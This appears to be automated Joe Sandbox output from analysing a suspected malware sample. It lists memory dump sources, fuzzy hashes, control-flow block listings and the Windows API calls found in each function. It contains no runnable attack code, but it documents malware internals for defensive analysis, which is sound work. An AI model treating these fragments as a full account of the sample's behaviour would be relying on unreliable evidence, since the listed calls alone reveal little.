                                                                                            • Instruction ID: 6fbf656a9ef966db9da80585d7c6f210d1742d7ff7a36454dece97a4d2e544a2
                                                                                            • Opcode Fuzzy Hash: bf202b0da8ed9723126b87efd057d10958f7c0fce0866a8efd90e4a70af61148
                                                                                            • Instruction Fuzzy Hash: 5E524D34A007058FDB14DF28C844B99B7B2FF89314F2586E9D5586F3A2DB71A986CF41
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1252134939.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_4bf0000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3ada8e4d2c7fafd374a75178d7cd4275c5beb76ee56cc60547f34ccec105f62c
                                                                                            • Instruction ID: 0a6eee03785e7fcffdc7f5c3cb6764f3f40b5db9514b785c0851926428dca587
                                                                                            • Opcode Fuzzy Hash: 3ada8e4d2c7fafd374a75178d7cd4275c5beb76ee56cc60547f34ccec105f62c
                                                                                            • Instruction Fuzzy Hash: C2526E34A007058FDB14DF28C844B99B7B2FF89314F2586E9D5586F3A2DB71A986CF41
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1255850284.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6d00000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 603352d4b1afd64ba788f6788d547563513269940dce0386b44aa243e4a0ce22
                                                                                            • Instruction ID: 1cd0768aaa3ec829b88e6d420993a511c92bba9bcf106f2367cf6c74785016ef
                                                                                            • Opcode Fuzzy Hash: 603352d4b1afd64ba788f6788d547563513269940dce0386b44aa243e4a0ce22
                                                                                            • Instruction Fuzzy Hash: 9AC14C30D002589FEBA5DFA9D88079DBBB1EF89300F14C1A9D859AF295D770E985CF90
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1255850284.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6d00000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4721c4971a2b615baee2f35b47c1a8982f3c97ab5bd75fad7884156eddc6d8be
                                                                                            • Instruction ID: 9229ad36fca0affd5ecd665f2af4b19f554297fa22790e2ebb44bc82de7a1dd0
                                                                                            • Opcode Fuzzy Hash: 4721c4971a2b615baee2f35b47c1a8982f3c97ab5bd75fad7884156eddc6d8be
                                                                                            • Instruction Fuzzy Hash: 70C13C30D002189FEF65DFA5D88079DBBB2EF88300F14C1A9D859AB295D770E985CF90
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1255850284.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6d00000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c68ed3dd928c2400be3146e84543fc4f68618989d300b033c1ecd5450edcbf80
                                                                                            • Instruction ID: 65b1af655aa109ed04e1580d616bf2de6199687479d8b8531e033d08b0b69ea3
                                                                                            • Opcode Fuzzy Hash: c68ed3dd928c2400be3146e84543fc4f68618989d300b033c1ecd5450edcbf80
                                                                                            • Instruction Fuzzy Hash: 2921B5B1D046188BEB68CFABD94079EFBF6BFC8300F14C46AC458A7255EB7459468F90
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1255850284.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6d00000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f89167f1b7127134182fd34663d3fa488473f85982819b528b9a5aa1b205aede
                                                                                            • Instruction ID: 8c2b8f58aca9766f13c5be3cb95cb9031c61a2e13767c5bb814701002a6e2b12
                                                                                            • Opcode Fuzzy Hash: f89167f1b7127134182fd34663d3fa488473f85982819b528b9a5aa1b205aede
                                                                                            • Instruction Fuzzy Hash: 8921D8B1D046188BEB68CFABD94079EFBF6BFC8300F14C06AC418A7255EB7449468F90

                                                                                            Control-flow Graph (legend: Executed / Not Executed)
                                                                                            control_flow_graph (rendered graph collapsed to its recoverable data): function 9fd570-9fd74d in the 009F0000 dump. Block sequence: 9fd570-9fd60f GetCurrentProcess; 9fd618-9fd64c GetCurrentThread; 9fd655-9fd689 GetCurrentProcess; 9fd692-9fd6ad call 9fd753; 9fd6b3-9fd6e2 GetCurrentThreadId; 9fd6eb-9fd74d exit. Each API call is followed by a short error-check block (9fd611, 9fd64e, 9fd68b, 9fd6e4) that falls through to the next call.
                                                                                            APIs
                                                                                            • GetCurrentProcess.KERNEL32 ref: 009FD5FE
                                                                                            • GetCurrentThread.KERNEL32 ref: 009FD63B
                                                                                            • GetCurrentProcess.KERNEL32 ref: 009FD678
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 009FD6D1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1246179678.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_9f0000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID: Current$ProcessThread
                                                                                            • String ID:
                                                                                            • API String ID: 2063062207-0
                                                                                            • Opcode ID: f2fcc127aba743f6fb1cbfd3c14e93a810177349926c976e27aba949f01e0c41
                                                                                            • Instruction ID: 53ea91d522e3c075b2d68fadbf6cc75782dafac60c543c5133a13b2dbbb630cf
                                                                                            • Opcode Fuzzy Hash: f2fcc127aba743f6fb1cbfd3c14e93a810177349926c976e27aba949f01e0c41
                                                                                            • Instruction Fuzzy Hash: 665177B0D01349DFEB14CFAAD548BAEBBF1EF88304F248459E108AB351D7746845CB66

                                                                                            Control-flow Graph (legend: Executed / Not Executed; basic blocks listed with their successor blocks)
                                                                                            • 317 9fd580-9fd60f GetCurrentProcess -> 321, 322
                                                                                            • 321 9fd618-9fd64c GetCurrentThread -> 323, 324
                                                                                            • 322 9fd611-9fd617 -> 321
                                                                                            • 323 9fd64e-9fd654 -> 324
                                                                                            • 324 9fd655-9fd689 GetCurrentProcess -> 326, 327
                                                                                            • 326 9fd68b-9fd691 -> 327
                                                                                            • 327 9fd692-9fd6ad call 9fd753 -> 330
                                                                                            • 330 9fd6b3-9fd6e2 GetCurrentThreadId -> 331, 332
                                                                                            • 331 9fd6eb-9fd74d
                                                                                            • 332 9fd6e4-9fd6ea -> 331
                                                                                            APIs
                                                                                            • GetCurrentProcess.KERNEL32 ref: 009FD5FE
                                                                                            • GetCurrentThread.KERNEL32 ref: 009FD63B
                                                                                            • GetCurrentProcess.KERNEL32 ref: 009FD678
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 009FD6D1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1246179678.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_9f0000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID: Current$ProcessThread
                                                                                            • String ID:
                                                                                            • API String ID: 2063062207-0
                                                                                            • Opcode ID: 28b3582edda7f3c0f014efc15eecf255b7202a1a6fa8cce88cd540b65af52cb4
                                                                                            • Instruction ID: 79551d16efb2fbd1ec81512603655f68ef0dbbd57695bcbdb4ffdba5d1d111c4
                                                                                            • Opcode Fuzzy Hash: 28b3582edda7f3c0f014efc15eecf255b7202a1a6fa8cce88cd540b65af52cb4
                                                                                            • Instruction Fuzzy Hash: 9B5155B0D01709CFEB24DFAAD648BAEBBF1EB88304F208459E109AB350D7745944CB66

                                                                                            Control-flow Graph (legend: Executed / Not Executed; basic blocks listed with their successor blocks)
                                                                                            • 2381 9fb2df-9fb2ff -> 2382, 2383
                                                                                            • 2382 9fb32b-9fb32f -> 2384, 2385
                                                                                            • 2383 9fb301-9fb30e call 9faca4 -> 2388, 2389
                                                                                            • 2384 9fb343-9fb384 -> 2392, 2393
                                                                                            • 2385 9fb331-9fb33b -> 2384
                                                                                            • 2388 9fb324 -> 2382
                                                                                            • 2389 9fb310 -> 2436, 2437
                                                                                            • 2392 9fb386-9fb38e -> 2393
                                                                                            • 2393 9fb391-9fb39f -> 2395, 2396
                                                                                            • 2394 9fb31c-9fb31e -> 2388, 2399
                                                                                            • 2395 9fb3c3-9fb3c5 -> 2400
                                                                                            • 2396 9fb3a1-9fb3a6 -> 2397, 2398
                                                                                            • 2397 9fb3a8-9fb3af call 9facb0 -> 2402
                                                                                            • 2398 9fb3b1 -> 2402
                                                                                            • 2399 9fb460-9fb520 -> 2431, 2432
                                                                                            • 2400 9fb3c8-9fb3cf -> 2403, 2404
                                                                                            • 2402 9fb3b3-9fb3c1 -> 2400
                                                                                            • 2403 9fb3dc-9fb3e3 -> 2406, 2407
                                                                                            • 2404 9fb3d1-9fb3d9 -> 2403
                                                                                            • 2406 9fb3e5-9fb3ed -> 2407
                                                                                            • 2407 9fb3f0-9fb3f2 call 9facc0 -> 2410
                                                                                            • 2410 9fb3f7-9fb3f9 -> 2412, 2413
                                                                                            • 2412 9fb3fb-9fb403 -> 2413
                                                                                            • 2413 9fb406-9fb40b -> 2415, 2416
                                                                                            • 2415 9fb40d-9fb414 -> 2416, 2417
                                                                                            • 2416 9fb429-9fb436 -> 2422, 2423
                                                                                            • 2417 9fb416-9fb426 call 9facd0 call 9face0 -> 2416
                                                                                            • 2422 9fb459-9fb45f
                                                                                            • 2423 9fb438-9fb456 -> 2422
                                                                                            • 2431 9fb528-9fb553 GetModuleHandleW -> 2433, 2434
                                                                                            • 2432 9fb522-9fb525 -> 2431
                                                                                            • 2433 9fb55c-9fb570
                                                                                            • 2434 9fb555-9fb55b -> 2433
                                                                                            • 2436 9fb316 call 9fb579 -> 2394
                                                                                            • 2437 9fb316 call 9fb588 -> 2394
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 009FB546
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1246179678.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_9f0000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID: HandleModule
                                                                                            • String ID:
                                                                                            • API String ID: 4139908857-0
                                                                                            • Opcode ID: ebe686152f3eb003c81d25012c603972acffff8ecfe016a11571a7faca6a07ad
                                                                                            • Instruction ID: fef87e47286737419ab3504a93e8c1318b077b384c0392c6ca79d38cae0334b8
                                                                                            • Opcode Fuzzy Hash: ebe686152f3eb003c81d25012c603972acffff8ecfe016a11571a7faca6a07ad
                                                                                            • Instruction Fuzzy Hash: 4F818870A00B098FD724CF69D5517AABBF5FF88300F00892EE58AC7A51D774E806CB91

                                                                                            Control-flow Graph (legend: Executed / Not Executed; basic blocks listed with their successor blocks)
                                                                                            • 2438 9f590d-9f59d9 CreateActCtxA -> 2440, 2441
                                                                                            • 2440 9f59db-9f59e1 -> 2441
                                                                                            • 2441 9f59e2-9f5a3c -> 2448, 2449
                                                                                            • 2448 9f5a3e-9f5a41 -> 2449
                                                                                            • 2449 9f5a4b-9f5a4f -> 2450, 2451
                                                                                            • 2450 9f5a51-9f5a5d -> 2451
                                                                                            • 2451 9f5a60 -> 2453
                                                                                            • 2453 9f5a61 -> 2453 (self-loop)
                                                                                            APIs
                                                                                            • CreateActCtxA.KERNEL32(?), ref: 009F59C9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1246179678.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_9f0000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID: Create
                                                                                            • String ID:
                                                                                            • API String ID: 2289755597-0
                                                                                            • Opcode ID: 34ce465e170d1483eb2bf4e8d3cddc6476738f637f4ac4b399885b18bc11c15b
                                                                                            • Instruction ID: c5b4ffa92b4d4a7d94f5b14fa6154f0c8450ff159a60d0dfd476bb6b0bb7bd4d
                                                                                            • Opcode Fuzzy Hash: 34ce465e170d1483eb2bf4e8d3cddc6476738f637f4ac4b399885b18bc11c15b
                                                                                            • Instruction Fuzzy Hash: 0841EF71C0071DCFEB24DFA9C884B9DBBB6BF49304F24816AD508AB251DB756946CF90
                                                                                            APIs
                                                                                            • CreateActCtxA.KERNEL32(?), ref: 009F59C9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1246179678.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_9f0000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID: Create
                                                                                            • String ID:
                                                                                            • API String ID: 2289755597-0
                                                                                            • Opcode ID: 0ee029a88fb394bd561fe32f92dfeb4b6a65d432913af6679ce919d9fcf4620a
                                                                                            • Instruction ID: 24870b03d8de0c27a2e8b402e735b84e518039171e58733b07c1d93426ec488b
                                                                                            • Opcode Fuzzy Hash: 0ee029a88fb394bd561fe32f92dfeb4b6a65d432913af6679ce919d9fcf4620a
                                                                                            • Instruction Fuzzy Hash: 9941D070C0071DCBEB24DFA9C884B9EBBB5BF49304F20816AD508AB251DB756946CF90
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1255850284.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6d00000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateFromIconResource
                                                                                            • String ID:
                                                                                            • API String ID: 3668623891-0
                                                                                            • Opcode ID: 7fc4554f12635669bd1e0ed0423dcc4c99987fbeeeb975e81f4030ce10ac66af
                                                                                            • Instruction ID: ff7e8560d3de83a5834359babb2e8b4721edb7e01dfc7fa4f25ede908c5a0e3b
                                                                                            • Opcode Fuzzy Hash: 7fc4554f12635669bd1e0ed0423dcc4c99987fbeeeb975e81f4030ce10ac66af
                                                                                            • Instruction Fuzzy Hash: C9317872900389DFDB11DFA9C944BEABFF4EF09310F14845AE954AB261C33A9854DFA1
                                                                                            APIs
                                                                                            • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,06D05AF5,?,?), ref: 06D05BA7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1255850284.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6d00000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID: DrawText
                                                                                            • String ID:
                                                                                            • API String ID: 2175133113-0
                                                                                            • Opcode ID: 9942cee9babd3b759f1ab506ee2f5484292678d2ddf1ededd52d966247431f34
                                                                                            • Instruction ID: 8eeb29adc3e8c7964ba1f03e6bb2e7e40155e7c6a37ce085edb39e003dfa1582
                                                                                            • Opcode Fuzzy Hash: 9942cee9babd3b759f1ab506ee2f5484292678d2ddf1ededd52d966247431f34
                                                                                            • Instruction Fuzzy Hash: B631E5B5D012499FDB10CF9AE980ADEFBF4FB48310F14842AE918A7350D775A544CFA0
                                                                                            APIs
                                                                                            • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,06D05AF5,?,?), ref: 06D05BA7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1255850284.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6d00000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID: DrawText
                                                                                            • String ID:
                                                                                            • API String ID: 2175133113-0
                                                                                            • Opcode ID: 1c499d55c88151e7edf9b1d9a628dacbd7d9d7a3c861a0e7b85c60271161fbcd
                                                                                            • Instruction ID: c9c785c3c69733b1276769c394e90bf510517c9ea1a3365a9bc94ddb03a1d64c
                                                                                            • Opcode Fuzzy Hash: 1c499d55c88151e7edf9b1d9a628dacbd7d9d7a3c861a0e7b85c60271161fbcd
                                                                                            • Instruction Fuzzy Hash: 9431E2B5D00249AFEB10CF9AD984BDEBBF4FB48210F14842AE819A7350D775A940CFA4
                                                                                            APIs
                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 009FD84F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1246179678.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_9f0000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID: DuplicateHandle
                                                                                            • String ID:
                                                                                            • API String ID: 3793708945-0
                                                                                            • Opcode ID: 0415e90211772eae59a6d4edd6d184500ce3e50ea3913a68af9a89406f204918
                                                                                            • Instruction ID: ca31c2cc04b8b682519c8bcf4dffb3400077286d833deef9cff3b6b7eb874769
                                                                                            • Opcode Fuzzy Hash: 0415e90211772eae59a6d4edd6d184500ce3e50ea3913a68af9a89406f204918
                                                                                            • Instruction Fuzzy Hash: F321F4B5C01248AFDB10CFAAD584AEEBFF5EB48310F14841AE954A7310D375A945CF60
                                                                                            APIs
                                                                                            • MonitorFromPoint.USER32(?,?,00000002), ref: 04BF4ECF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1252134939.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_4bf0000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID: FromMonitorPoint
                                                                                            • String ID:
                                                                                            • API String ID: 1566494148-0
                                                                                            • Opcode ID: 9bcdc6c7190ee9daa1ea162c8bb89ec2c68b9cec00604548420e2433b8d2bc4d
                                                                                            • Instruction ID: d6f314bd84e1aef7a6b9dd00415bfa9ddb7fb793bf2015c1ddd0ed8dd087ba22
                                                                                            • Opcode Fuzzy Hash: 9bcdc6c7190ee9daa1ea162c8bb89ec2c68b9cec00604548420e2433b8d2bc4d
                                                                                            • Instruction Fuzzy Hash: 69215E75D002489FDB20DF99D405BAEBBF5FB58310F108419E959B7340D735AA48CFA1
                                                                                            APIs
                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 009FD84F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1246179678.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_9f0000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID: DuplicateHandle
                                                                                            • String ID:
                                                                                            • API String ID: 3793708945-0
                                                                                            • Opcode ID: 5956a024b452dbb399c1b5e6c0c867322aab6ec156a16ccd74f756d25c002f1d
                                                                                            • Instruction ID: e9670bdf66149e781e9972d92429453e171d7689bb68f00b11108f80dcd94839
                                                                                            • Opcode Fuzzy Hash: 5956a024b452dbb399c1b5e6c0c867322aab6ec156a16ccd74f756d25c002f1d
                                                                                            • Instruction Fuzzy Hash: 8321E4B5D01248EFDB10CF9AD584ADEBBF9FB48320F14841AE918A7350D379A940CF65
                                                                                            APIs
                                                                                            • MonitorFromPoint.USER32(?,?,00000002), ref: 04BF4ECF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1252134939.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_4bf0000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID: FromMonitorPoint
                                                                                            • String ID:
                                                                                            • API String ID: 1566494148-0
                                                                                            • Opcode ID: 5f410fb1a001761df1f7a9b32abd3db6804833cc16276be9b23e4cf3bfe22658
                                                                                            • Instruction ID: 37a0d95a28699812b449a5b029d4f44a3b33309d6d9c3237af112be98c2acef5
                                                                                            • Opcode Fuzzy Hash: 5f410fb1a001761df1f7a9b32abd3db6804833cc16276be9b23e4cf3bfe22658
                                                                                            • Instruction Fuzzy Hash: 9C216DB5D003489FDB11DF99D504BAEBBB0FB48310F108459E959B7380D734AA44CFA1
                                                                                            APIs
                                                                                            • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,06D0783A,?,?,?,?,?), ref: 06D078DF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1255850284.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6d00000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateFromIconResource
                                                                                            • String ID:
                                                                                            • API String ID: 3668623891-0
                                                                                            • Opcode ID: 60d7ce16a2dfb28095b57324ebde3eed90002995aac86d11034e397fa33880cb
                                                                                            • Instruction ID: 2ff7f870a05b5daaffb44857f5535db8439e54e135c9183d3e995141253e527c
                                                                                            • Opcode Fuzzy Hash: 60d7ce16a2dfb28095b57324ebde3eed90002995aac86d11034e397fa33880cb
                                                                                            • Instruction Fuzzy Hash: E9115972800349DFEB20CFAAC844BDEBBF8EB48310F14841AE954A7250C375A950DFA4
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 009FB546
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1246179678.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_9f0000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID: HandleModule
                                                                                            • String ID:
                                                                                            • API String ID: 4139908857-0
                                                                                            • Opcode ID: 8384b06d85f11107177b6db95a7cd1e9f5c629ac370d0264a8100c74ff9401df
                                                                                            • Instruction ID: 96e5a2d2e41bd1f6e7734962d4f4a8fa7cfbf68c7234d31e3b50aa1d0c08213f
                                                                                            • Opcode Fuzzy Hash: 8384b06d85f11107177b6db95a7cd1e9f5c629ac370d0264a8100c74ff9401df
                                                                                            • Instruction Fuzzy Hash: 7E110FB6C002498FDB20CF9AD444ADEFBF8EB88310F10842AD518A7600C379A545CFA1
                                                                                            APIs
                                                                                            • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,04BF3DA9,?,?), ref: 04BF3F50
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1252134939.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_4bf0000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseHandle
                                                                                            • String ID:
                                                                                            • API String ID: 2962429428-0
                                                                                            • Opcode ID: d523c7b5ea3f4414d048a53139db812efecec8b580ca6ad6a84ebf30a71d8db8
                                                                                            • Instruction ID: 5b0f6fca9f52813a1b3be99a169718d26e15cfa69ce993870d86bf0f79ecd11f
                                                                                            • Opcode Fuzzy Hash: d523c7b5ea3f4414d048a53139db812efecec8b580ca6ad6a84ebf30a71d8db8
                                                                                            • Instruction Fuzzy Hash: 6F1155B2800349DFDB20DF9AC444BDEBBF4EB48320F108469E958A7340D339A944CFA5
                                                                                            APIs
                                                                                            • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,04BF3DA9,?,?), ref: 04BF3F50
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1252134939.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_4bf0000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseHandle
                                                                                            • String ID:
                                                                                            • API String ID: 2962429428-0
                                                                                            • Opcode ID: 6265a4d3917e97b8e45328b716dc2e7680eca05f2053299e84bc7d99dd708a88
                                                                                            • Instruction ID: ea465937f9bd0fab48b53b8b0ae3d3b9ea156dc98abb21691c7741cc6c8cdd87
                                                                                            • Opcode Fuzzy Hash: 6265a4d3917e97b8e45328b716dc2e7680eca05f2053299e84bc7d99dd708a88
                                                                                            • Instruction Fuzzy Hash: 481125B6C00249DFDB20DF99D444BEEBBF0EB48320F20845AD958A7740D339A645CFA5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1245989626.00000000008FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008FD000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_8fd000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b2bf125938f2d2a735d86717d160556e1770b0a857166f5057155cceaefbbf51
                                                                                            • Instruction ID: b3210293de26a6ffb5b6e1fbf0ffcc392afbb3cc2dd5f6ea489cc036dc9634ed
                                                                                            • Opcode Fuzzy Hash: b2bf125938f2d2a735d86717d160556e1770b0a857166f5057155cceaefbbf51
                                                                                            • Instruction Fuzzy Hash: 6E21F472500348DFDB15DF24D9C0B26BB66FB98318F20C569EA054B256C336D856DAA2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1246024272.000000000090D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0090D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_90d000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 37336c54d2992a4cdebb6231869d666f9e627b47c370f5d1e6ce3c8b9669e907
                                                                                            • Instruction ID: 451b52a4d9557e0edf032363c15ef7671e1425cb7514ef66917472b80daed96d
                                                                                            • Opcode Fuzzy Hash: 37336c54d2992a4cdebb6231869d666f9e627b47c370f5d1e6ce3c8b9669e907
                                                                                            • Instruction Fuzzy Hash: 6F210471905300EFDB15DFA8D9C0B26BBA5FB84314F20C96DE8094F2D2C33AD846CA62
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1246024272.000000000090D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0090D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_90d000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e27c4771285f13ed6b2d2b650fb181d36aa9770dae298ad24771d129f82c67ba
                                                                                            • Instruction ID: 4c28ce9ceadf38c62da49d2136f5ee064169966c06bbc730f1a5837acf55574b
                                                                                            • Opcode Fuzzy Hash: e27c4771285f13ed6b2d2b650fb181d36aa9770dae298ad24771d129f82c67ba
                                                                                            • Instruction Fuzzy Hash: 8921D071604200EFDB14DF64D984B26BBB5EB84314F20C96DE80E4B2D6C33AD847CA62
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1245989626.00000000008FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008FD000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_8fd000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0d9143a8ff6c40554208124bd87d7ebbaad978752f52efe449982275cc027c51
                                                                                            • Instruction ID: e2b2a084d918456ca3da9052ea4a6d4347c0e1aaa02a7bf123ce8ed703d971a3
                                                                                            • Opcode Fuzzy Hash: 0d9143a8ff6c40554208124bd87d7ebbaad978752f52efe449982275cc027c51
                                                                                            • Instruction Fuzzy Hash: 0311E172404284DFCB15CF10D5C0B26BF72FB88314F24C6A9DA094B656C336D85ACBA2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1246024272.000000000090D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0090D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_90d000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
